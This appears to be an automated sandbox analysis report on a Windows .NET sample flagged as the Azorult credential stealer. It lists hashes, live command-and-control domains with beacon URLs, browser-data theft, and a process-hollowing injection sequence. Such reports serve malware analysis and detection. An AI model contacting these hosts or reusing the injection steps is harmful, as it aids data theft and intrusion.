Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 26, 2023, 5:09 p.m.	Oct. 26, 2023, 5:11 p.m.

Size	669.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`699b84a4a3c73a574bc51f461ad209db`
SHA256	`037500eba0044c05416217ea9936c6b9f4d9ee9a0a05d2d7860245fffdd347b6`
CRC32	`6A90D787`
ssdeep	`12288:bwmi1J9z8Vll86H2O/YJGkcOCXZXr+MNIPXSQ9GWpxgJI02k+warh:bwTJ9gVj8xXeVr+MmPX/0Hq0r+L`
PDB Path	LyoY.pdb
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

audiodgse.exe "C:\Users\test22\AppData\Local\Temp\audiodgse.exe"
660
- audiodgse.exe "C:\Users\test22\AppData\Local\Temp\audiodgse.exe"
  2592
raserver.exe "C:\Windows\SysWOW64\raserver.exe"
2692
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2904

Name	Response	Post-Analysis Lookup
www.lesresort.shop	A 195.24.68.17	195.24.68.17
www.bradslinkard.com	A 192.64.119.8	192.64.119.8
www.mantap89.online	A 172.67.196.229 A 104.21.68.166	104.21.68.166
www.viteview.com	A 91.195.240.19 CNAME parkingpage.namecheap.com	91.195.240.19
www.dulcestipicos.madrid	A 217.76.128.47	217.76.128.47
www.yektakhodro.com		94.130.16.79
www.hotelunivers84.com	A 38.60.119.195	38.60.119.195
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.196.229	Active	Moloch
192.64.119.8	Active	Moloch
195.24.68.17	Active	Moloch
217.76.128.47	Active	Moloch
38.60.119.195	Active	Moloch
45.33.6.223	Active	Moloch
91.195.240.19	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.64.119.8:80 -> 192.168.56.103:49176	2035208	ET INFO Namecheap URL Forward	Misc activity
TCP 192.64.119.8:80 -> 192.168.56.103:49175	2035208	ET INFO Namecheap URL Forward	Misc activity

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 26, 2023, 5:09 p.m.			0	0
IsDebuggerPresent Oct. 26, 2023, 5:09 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

LyoY.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 26, 2023, 5:09 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (16 events)

request	POST http://www.mantap89.online/oqhk/
request	GET http://www.mantap89.online/oqhk/?bako0dX=S2m6rfkUSom5w0b7Ipxh2DNk1m9IPJXz3fqcnXIby6Ndme1p43G34NGcdGAoCpYc86T+rPxS+KXiNPcERtIPtWsYq4ye6AkIsFSj9I4=&greuv=_l0UeH-j
request	GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
request	GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
request	GET http://www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
request	GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
request	POST http://www.bradslinkard.com/oqhk/
request	GET http://www.bradslinkard.com/oqhk/?bako0dX=N4ucd4g4l1dZ2qGFTw7idyXvyaW+Ee16SQSADc8X19YTlucSrBjmFKf/w61t+cVDZF+Cv3nXd37ImMhdkLLkqGCWD7dYz7Y/PDlK8E0=&greuv=_l0UeH-j
request	POST http://www.hotelunivers84.com/oqhk/
request	GET http://www.hotelunivers84.com/oqhk/?bako0dX=ny2+kNq0TTwUQoT+yWcRsV0rrofOZAprZEjYBUSORFlkl7yyw3wHAwikv9M/XIb7Vb9CydmgU81jxMUJpZZfGxmCA4effnpQvUqRpws=&greuv=_l0UeH-j
request	POST http://www.lesresort.shop/oqhk/
request	GET http://www.lesresort.shop/oqhk/?bako0dX=ff4ZaO4z0LwhFY634jl7gcCh+ZETZf8CF+luNTd+hEDA5tqtaOX6gCfC+V0Se8kHkKwe9I+4UGuDQOYQqBkPDKNc7C4IxytBHGBC2MU=&greuv=_l0UeH-j
request	POST http://www.viteview.com/oqhk/
request	GET http://www.viteview.com/oqhk/?bako0dX=eG34oexJxfnLxzWwFjfA8qxnzIyhxwbIg0NkFT4wXzFcXqEyizbaCmhnbj96/dF1qfqKIUS0mD3JGP9hvWi/zxGK9PvSMu57UFl2s1E=&greuv=_l0UeH-j
request	POST http://www.dulcestipicos.madrid/oqhk/
request	GET http://www.dulcestipicos.madrid/oqhk/?bako0dX=/ThYvMNrvRucvt4J1E9RqsGocIgAqtVW1h5dNoGQzRAGxYBOFkp+4ID6/OO1Kr6OXXhhFgVnaqvWabqpbYkKzr+Ho2WxC82XWJdkzHw=&greuv=_l0UeH-j

Sends data using the HTTP POST Method (6 events)

request	POST http://www.mantap89.online/oqhk/
request	POST http://www.bradslinkard.com/oqhk/
request	POST http://www.hotelunivers84.com/oqhk/
request	POST http://www.lesresort.shop/oqhk/
request	POST http://www.viteview.com/oqhk/
request	POST http://www.dulcestipicos.madrid/oqhk/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 62 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00445000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0039a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00791000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d10178 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d101a0 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d101c8 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d25efe process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d25ef2 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 72 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d10208 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df00 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df20 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df28 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df2c process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df34 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df38 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df3c process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df40 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df48 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df4c process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df50 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df58 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d1df5c process_handle: 0xffffffff		3221225550
NtAllocateVirtualMemory Oct. 26, 2023, 5:09 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0039c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0

Steals private information from local Internet browsers (1 event)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\audiodgse.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\audiodgse.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000a6c00', u'virtual_address': u'0x00002000', u'entropy': 7.9578387861091855, u'name': u'.text', u'virtual_size': u'0x000a6b1c'}

entropy

7.95783878611

description

A section with a high entropy has been found

entropy

0.997010463378

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 26, 2023, 5:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Terminates another process (4 events)

Time & API	Arguments	Status
NtTerminateProcess Oct. 26, 2023, 5:10 p.m.	status_code: 0xffffffff process_identifier: 2520 process_handle: 0x00000260
NtTerminateProcess Oct. 26, 2023, 5:10 p.m.	status_code: 0xffffffff process_identifier: 2520 process_handle: 0x00000260	1
NtTerminateProcess Oct. 26, 2023, 5:10 p.m.	status_code: 0xffffffff process_identifier: 2556 process_handle: 0x0000026c
NtTerminateProcess Oct. 26, 2023, 5:10 p.m.	status_code: 0xffffffff process_identifier: 2556 process_handle: 0x0000026c	1

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2520 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000250		3221225496
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2556 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264		3221225496
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2592 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000268	1	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\audiodgse.exe

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 660 manipulating memory of non-child process 2520
Process injection	Process 660 manipulating memory of non-child process 2556
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2520 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000250	3221225496	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2556 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264	3221225496	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 26, 2023, 5:10 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELvzìWà¾ðÐ@Ð@.text¼¾ ` base_address: 0x00400000 process_identifier: 2592 process_handle: 0x00000268	1	1	0
WriteProcessMemory Oct. 26, 2023, 5:10 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2592 process_handle: 0x00000268	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 26, 2023, 5:10 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPELvzìWà¾ðÐ@Ð@.text¼¾ ` base_address: 0x00400000 process_identifier: 2592 process_handle: 0x00000268	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 660 called NtSetContextThread to modify thread in remote process 2592
NtSetContextThread Oct. 26, 2023, 5:10 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199664 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000026c process_identifier: 2592	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 660 resumed a thread in remote process 2592
NtResumeThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x0000026c suspend_count: 1 process_identifier: 2592	1	0	0

Executed a process and injected code into it, probably while unpacking (24 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 660	1	0
NtResumeThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 660	1	0
NtResumeThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 660	1	0
NtResumeThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 660	1	0
NtGetContextThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Oct. 26, 2023, 5:09 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 660	1	0
NtResumeThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x00000248 suspend_count: 1 process_identifier: 660	1	0
CreateProcessInternalW Oct. 26, 2023, 5:10 p.m.	thread_identifier: 2524 thread_handle: 0x0000024c process_identifier: 2520 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\audiodgse.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\audiodgse.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000250	1	1
NtGetContextThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x0000024c	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2520 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000250		3221225496
CreateProcessInternalW Oct. 26, 2023, 5:10 p.m.	thread_identifier: 2560 thread_handle: 0x00000260 process_identifier: 2556 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\audiodgse.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\audiodgse.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000264	1	1
NtGetContextThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x00000260	1	0
NtAllocateVirtualMemory Oct. 26, 2023, 5:10 p.m.	process_identifier: 2556 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264		3221225496
CreateProcessInternalW Oct. 26, 2023, 5:10 p.m.	thread_identifier: 2596 thread_handle: 0x0000026c process_identifier: 2592 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\audiodgse.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\audiodgse.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000268	1	1
NtGetContextThread Oct. 26, 2023, 5:10 p.m.	thread_handle: 0x0000026c	1	0
